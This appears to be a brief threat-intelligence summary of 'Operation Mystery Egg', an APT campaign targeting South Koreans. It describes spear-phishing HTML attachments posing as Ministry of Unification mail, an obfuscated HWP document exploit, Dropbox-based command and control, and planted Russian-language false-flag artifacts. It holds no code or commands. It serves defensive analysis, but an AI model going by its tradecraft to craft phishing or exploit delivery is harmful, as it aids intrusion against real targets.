Operation Mystery Egg is described as an APT campaign by the Geumseong121 group that impersonated South Korea’s Ministry of Unification and used a lure about a government survey on separated North-South families. Instead of attaching an executable or HWP file directly, the attackers sent an HTML attachment made to look like a protected security-mail attachment, creating a different spear-phishing delivery vector. The campaign also involved an HWP document vulnerability with added PostScript reverse obfuscation, and an encrypted payload hidden in the document stream that communicated covertly with Dropbox-based C2 after shellcode execution. The excerpt notes Russian-language code fragments in the IOCs and assesses them as likely false-flag artifacts intended to confuse attribution analysis. The activity matters because it combines Korean government-themed social engineering, document exploitation, cloud C2, and deception tradecraft against South Korean targets.